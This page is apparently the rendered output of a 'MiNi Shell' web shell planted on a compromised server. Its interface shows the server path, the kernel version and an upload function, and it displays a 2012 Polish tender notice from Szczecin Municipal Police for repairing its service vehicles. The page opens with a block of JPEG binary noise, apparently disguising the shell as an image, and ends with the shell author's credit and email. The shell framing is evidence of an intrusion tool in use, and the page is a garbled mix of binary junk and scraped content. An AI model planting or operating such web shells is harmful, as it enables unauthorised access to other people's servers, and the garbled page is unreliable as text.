JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121005/384592-N-2012.html

<p class="kh_header"><b>Szczecin: Naprawa pojazdów samochodowych Straży Miejskiej Szczecin</b><br>
<b>Numer ogłoszenia: 384592 - 2012; data zamieszczenia: 05.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Szczecin , ul. Zygmunta Felczaka 9, 71-471 Szczecin, woj. zachodniopomorskie, tel. 91 442 76 13, faks 91 422 87 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa pojazdów samochodowych Straży Miejskiej Szczecin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Naprawy samochodów służbowych Straży Miejskiej Szczecin.
1.Zakres zamówienia obejmuje:  
Zadanie 1 - Naprawy samochodów służbowych Straży Miejskiej Szczecin:
	Marka pojazdu	Rodzaj paliwa	Ilość egz.	Rok produkcji
	Fiat Albea1,3	    PB 95	  7 szt.	2004,2005,2006
	Fiat Doblo 1,3D	    ON	  3 szt.	2005,2006
	Fiat Doblo 1,4	    PB 95	  3 szt.	2008
	Fiat Doblo 1,9D	    ON	  1 szt.	2006
	Fiat Panda 1,2	    PB 95	  2 szt.	2011
	Peugeot Partner 1,6D ON  	  2 szt.	2007
	Skoda Oktawia 1,6	    PB 95	  1 szt.	1998
	Toyota Hilux 3,0D	   ON	  1 szt.	2010
	Polonez 1,6	   PB 95	  2 szt.	1997,1999
Razem	22 pojazdy	

Zadanie 2 -  Naprawy samochodów służbowych Oddziału Prawobrzeże Straży   Miejskiej:
	Marka pojazdu	Rodzaj paliwa	Ilość egz.	Rok produkcji
	Fiat Albea1,3	PB 95	1 szt.	2004
	Fiat Doblo 1,3D	ON	3 szt.	2005, 2006
	Polonez 1,6	PB 95	1 szt.	1998
	Renault Traffic	ON	1 szt.	2007
Razem	6	pojazdów	

2.Zakres napraw obejmuje:1)naprawy wynikające ze zleconych przeglądów technicznych, 2)naprawy wynikające z awarii  mechanicznej, elektrycznej i elektronicznej układów mechanizmów i części pojazdu,3)serwis i naprawa układów klimatyzacji pojazdów, 4)niezbędne regulacje mechanizmów i podzespołów; 
5)naprawy karoserii pojazdów; 6)naprawy tapicerki pojazdu;
Zamawiający wymaga aby stacja obsługi (warsztat), do którego będą dostarczane pojazdy znajdował  się w odległości do 10 kilometrów od: siedziby Zamawiającego mieszczącej się w Szczecinie przy ulicy Zygmunta Felczaka 9 dla zadania nr1; siedziby Oddziału Prawobrzeże mieszczącego się w Szczecinie przy ulicy Struga 10 dla zadania nr 2 oraz był wyposażony w: 1)stanowisko do diagnostyki komputerowej silnika,2)stanowisko do geometrii tylnej i przedniej osi, 3)testery diagnostyczne, 4)co najmniej dwa stanowiska do naprawy samochodów. 
3.Wykonanie napraw odbywać  się będzie na zlecenie Zamawiającego. 
4.Wykonawca obowiązany jest do przyjęcia do naprawy pojazdów Zamawiającego
   we wszystkie dni tygodnia z wyjątkiem niedziel i innych dni ustawowo wolnych
   od pracy.
5.Zamawiający dostarczy pojazd pod wskazany adres Wykonawcy. 
6.Nie dopuszcza się dokonywania zmian konstrukcyjnych w naprawianych
   pojazdach.
7.Części, mechanizmy, oleje użyte do napraw będą nowe - objęte gwarancją
   producenta. Za zgodą zamawiającego dopuszcza się zastosowanie części i
   mechanizmów zregenerowanych, nie mogą to być części i zespoły wchodzące 
   w skład układu kierowniczego i hamulcowego. Cena zregenerowanej części lub
   podzespołu nie może przekraczać 60% wartości nowego elementu. 
8.Materiały eksploatacyjne użyte do naprawy muszą być zgodne z zaleceniem
   producenta pojazdu. 
9.Wykonawca ponosi odpowiedzialność (ryzyko, utraty, uszkodzenia itp.) za
  pojazdy od czasu ich przyjęcia do naprawy do czasu przekazania
   zamawiającemu.  
10.Wykonanie napraw nieuzgodnionych z zamawiającym nie będzie rodziło 
    obowiązku zapłaty za wykonaną usługę.
11.Cena za usługę będzie obejmowała diagnozowanie oraz usunięcie usterki. 
12.Cena usługi jest ceną brutto zawierającą koszt roboczogodzin oraz użytych
    części zamiennych i materiałów z uwzględnieniem marży i podatku. 
13.Ilość roboczogodzin na naprawę części i mechanizmów nie może być wyższa
    niżwartości wykazane w załączniku 1c Normy czasu naprawy 
    w roboczogodzinach. 
14.Koszty naprawy części i mechanizmów nie wykazanych w załączniku 1a i 1b 
   (w zależności od zadania) do siwz, obliczane będą w oparciu o koszt
    roboczogodziny określony w załączniku 1 do siwz, normy czasu naprawy części
   (mechanizmu) określone na podstawie jednego z programów EUROTAX,
   AUDATEX, WorkshopData lub IC Katalog lub inne. Cena części użytych do
   naprawy nie może przekraczać rzeczywistej ceny nabycia powiększonej o
   należny podatek i marżę.
15.Dopuszcza się wykonywanie napraw przez podwykonawców. Wykonawca
    weźmie pełną odpowiedzialność za prace wykonane przez podwykonawcę.
    Wykonawca zleca wykonanie części prac podwykonawcom na własny koszt
    i ryzyko. 
16.Termin wykonania pojedynczej naprawy pojazdu nie może być dłuższy niż 3 dni
     robocze od dnia przekazania pojazdu do naprawy.
17.Termin wykonania pojedynczej naprawy może ulec przedłużeniu wyłącznie za
    zgodą zamawiającego, w sytuacji oczekiwania na części spowodowaną ich
    brakiem na rynku lokalnym.
18.Na wykonaną naprawę zostanie udzielona co najmniej 3-miesieczna gwarancja,
    a zastosowane podzespoły i części  będą posiadały ważną gwarancję producenta
    i będzie ona ważna przez co najmniej 12 miesięcy od dnia zamontowania w
    naprawianym pojeździe. W przypadku zastosowania zregenerowanych części
    mechanizmów wymaga się na nie minimum 6 miesięcy gwarancji.
19.Wykonawca jest gwarantem wszelkich wykonanych przez siebie ( i przez
    podwykonawców) usług i napraw.
20.Wykonawca musi dysponować odpowiednim zapleczem obsługowo remontowym,
    zapewniającym spełnienie warunków zamówienia tj. halą naprawczą, właściwą
    ilością stanowisk naprawczych zapewniających natychmiastowe przyjęcie
    pojazdu zamawiającego do naprawy, wyposażeniem umożliwiającym usunięcie
    usterek (awarii) przedstawionych w opisie przedmiotu zamówienia oraz
    stosownym personelem. 
21.Faktura za wykonaną usługę w treści musi zawierać koszt ogólny wykonanych
    usług i napraw, w załączniku do faktury wykonawca przedstawia zestawienie
    części i materiałów użytych w naprawie oraz liczbę roboczogodzin . 
22.Zamawiający zastrzega sobie prawo dokonania zmiany ilości pojazdów do
    przeglądów technicznych i napraw w przypadku zbycia pojazdu.
23.Wykonawca usługi zobowiązany jest:
    1)uzgodnić z Zamawiającym, w momencie przyjęcia samochodu do naprawy, 
       zakres robót oraz orientacyjną cenę za usługę, 
    2)przyjmować samochody od zamawiającego w dniu zgłoszenia naprawy, bez 
       konieczności wcześniejszej rezerwacji terminu wykonania usługi, za wyjątkiem 
       planowych obsługiwań technicznych wynikających z przebiegu kilometrów lub 
       lat eksploatacji, określonych w instrukcji obsługi producenta. 
    3)każdorazowo przed rozpoczęciem naprawy przedstawić Zamawiającemu
       wstępny kosztorys jej wykonania, dostarczony do zamawiającego - faksem 
       lub pocztą elektroniczną na adres zamawiającego. Rozpoczęcie naprawy może 
       odbyć się tylko i wyłącznie po akceptacji przez zamawiającego zakresu prac
       i kosztorysu naprawy. 
    4)do utylizacji części i materiałów wymienionych w czasie naprawy, przeglądu;
    5)przedstawienia na żądanie zamawiającego,części oraz dokumentów spełnienia 
      przez nie wymagań producenta. 6)usunięcia na własny koszt, w okresie 
      udzielonej przez Wykonawcę gwarancji, wad lub usterek związanych 
      z wykonaną naprawą, zastosowaniem części lub materiałów.
24.Zamawiający zakłada, iż jedna roboczogodzina stanowi 60 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających w wysokości nie przekraczającej 50% wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.20.00-4, 50.11.20.00-7, 98.39.40.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże , że:
 a)dysponuje lub będzie dysponować co najmniej jedną stacją obsługi (warsztatem
   samochodowym)  wyposażonym w: stanowisko do diagnostyki komputerowej 
   silnika, stanowisko do geometrii tylnej i przedniej osi, testery diagnostyczne, co
   najmniej dwa stanowiska do naprawy samochodów.
b)stacja obsługi (warsztat samochodowy)  znajduje się w odległości do 10 
  kilometrów (odległość wyrażona w pełnych kilometrach mierzona po utwardzonej 
  drodze publicznej) od: 
  Dla zadania nr 1 od siedziby Zamawiającego znajdującej się w Szczecinie przy
  ulicy Zygmunta Felczaka 9
  Dla zadania nr 2 od siedziby Straży Miejskiej Szczecin - oddział  Prawobrzeże,
  znajdującej się w Szczecinie przy ulicy ul. Struga 10.
  Jeżeli wykonawca składa ofertę na zadania nr1 i 2 to dopuszcza się wskazanie
  jednej stacji zlokalizowanej w odległości spełniającej łącznie wymóg dla obu zadań.
  Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na 
  podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE
 SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta cenowa według wzoru stanowiącego załącznik nr 1 do siwz, w przypadku 
    składania oferty wspólnej należy złożyć jeden dokument, 
2) Formularz cenowy - cena usługi brutto ( części/materiały z marżą i  podatkiem 
    VAT oraz roboczogodziny) , dla zadania nr 1 według wzoru stanowiącego 
    załącznik nr 1a do siwz,  dla zadania nr 2 według wzoru stanowiącego załącznik 
    nr 1b do siwz, dla całości oferty załączniki nr1a i 1b. W przypadku składania 
    oferty wspólnej należy złożyć jeden dokument, 3) odpowiednie pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy: 
1) wystąpi konieczność zmiany siedziby, NIP, REGON, 
2) wystąpi konieczność zmiany konta bankowego wykonawcy, 
3) wystąpi zmiana podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sm.szczecin.pl/chapter_86014.asp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szczecin 71-417, ul. Zygmunta Felczaka 9, pokój nr 0185..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2012 godzina 08:00, miejsce: Ofertę należy złożyć w sekretariacie Straży Miejskiej w Szczecinie przy 
ul. Zygmunta Felczaka 9, pok. nr 0169 w terminie do dnia 15.10.2012 r., 
do godz. 800.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.Zakres zamówienia obejmuje:  
Zadanie 1 - Naprawy samochodów służbowych Straży Miejskiej Szczecin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy samochodów służbowych Straży Miejskiej Szczecin:
Marka pojazdu	Rodzaj paliwa	Ilość egz.	Rok produkcji
Fiat Albea1,3	PB 95	             7 szt.	2004,2005,2006
Fiat Doblo 1,3D	  ON	             3 szt.	2005,2006
Fiat Doblo 1,4	  PB 95	             3 szt.	2008
Fiat Doblo 1,9D	  ON	             1 szt.	2006
Fiat Panda 1,2	  PB 95	             2 szt.	2011
Peugeot Partner 1,6D ON	             2 szt.	2007
Skoda Oktawia 1,6	PB 95	             1 szt.	1998
Toyota Hilux 3,0D	   ON	             1 szt.	2010
Polonez 1,6	   PB 95	             2 szt.	1997,1999
Razem	22 pojazdy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.20.00-4, 50.11.20.00-7, 98.39.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 -  Naprawy samochodów służbowych Oddziału Prawobrzeże Straży Miejskiej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 -  Naprawy samochodów służbowych Oddziału Prawobrzeże Straży Miejskiej:
Marka pojazdu	Rodzaj paliwa	Ilość egz.	Rok produkcji
Fiat Albea1,3	PB 95	             1 szt.	2004
Fiat Doblo 1,3D	ON	             3 szt.	2005, 2006
Polonez 1,6	PB 95	             1 szt.	1998
Renault Traffic	ON	             1 szt.	2007
Razem	6	pojazdy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3, 50.11.20.00-4, 50.11.20.00-7, 98.39.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com